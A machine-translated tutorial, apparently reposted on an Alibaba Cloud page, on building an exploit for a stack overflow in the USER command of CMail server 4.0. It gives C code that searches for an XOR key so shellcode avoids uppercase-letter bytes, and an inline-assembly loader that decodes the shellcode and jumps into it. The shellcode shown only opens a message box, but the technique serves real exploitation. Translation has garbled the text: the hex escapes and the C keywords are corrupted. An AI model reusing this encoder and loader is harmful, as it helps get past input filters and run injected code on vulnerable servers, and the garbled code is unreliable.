Programming key for shellcode xor Solution

Source: Internet
Author: User

Recently, I started to learn about stack overflow. I chose the simplest remote overflow vulnerability for The Cmail server 4.0 USER command.

CMAIL converts uppercase letters in shellcode to lowercase letters, so it is necessary to avoid characters between 0x40-0x5B. F. zh Daniel uses small shellcode to find the big shellcode in our original input. As a side dish, you also need to think about your own methods when learning your ideas, so you decided to use a more primitive xor algorithm to encode shellcode. But how can we find a suitable key for xor operations? Here I would like to show you my ideas.

Environment: WMware 7.1 + win2k adv server sp4 cn + vc ++ 6.0

# Include <stdio. h>
# Include <string. h>
# Include <windows. h>

Unsigned char shellcode [] =
"X33xdbx53x68x46x55x43x4b"
"X8bxc4x53x50x50x53"
"Xb8x98x80xe1x77xffxd0"; // shellcode msgbox on windows 2 k adv server sp4 21 bytes

Void main ()
{
Int I, len, tmp, key = 0x99;
Unsigned char * buf;

Len = strlen (char *) shellcode );
Buf = (unsigned char *) malloc (sizeof (char) * (len + 1 ));
Memset (buf, NULL, sizeof (buf ));

Printf ("Try to xor key from 0x01 to 0x99 for shellcode ");

While (key)
{
For (I = 0; I <len; I ++)
{
Tmp = shellcode [I] ^ key;
If (tmp> 0x40 & tmp <0x5B) break;
Memset (buf + I, tmp, 1 );
}
If (I = len)
{
Printf ("Yes !!! I found a key 0x % x for xor: ", key );
Printf ("unsigned char shellcode [] = "");
For (I = 0; I <len; I ++)
{
Printf ("\ X % 0.2x ", buf [I]);
If (I + 1) % 8 = 0) printf ("""");
}
Printf (""; // xor key 0x % 0.2x ", key );
Break;
}
Key --;
}
}

The code is simple and I believe it can be understood. Then a key is obtained after compilation and running.


Load shellcode to see the effect.

# Include <stdio. h>
# Include <windows. h>

/*
Char shellcode [] =
"X33xdbx53x68x46x55x43x4b"
"X8bxc4x53x50x50x53"
"Xb8x98x80xe1x77xffxd0"; // shellcode 21 bytes
*/
Unsigned char shellcode [] =
"X40xa8x20x1bx35x26x30x38"
"Xf8xb7x20x23x23x20xcbxeb"
"Xf3x92x04x8cxa3"; // xor key 0x73

Void main ()
{
Int I = 0;
LoadLibrary ("user32.dll ");

_ Asm
{

PUSH ecx
PUSH eax

XOR ecx, ecx
ADD ecx, 21
LEA eax, shellcode
A:
XOR [eax], 73 h
ADD eax, 1
LOOP

LEA eax, shellcode
JMP eax
}
}

There is no problem after decoding:


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.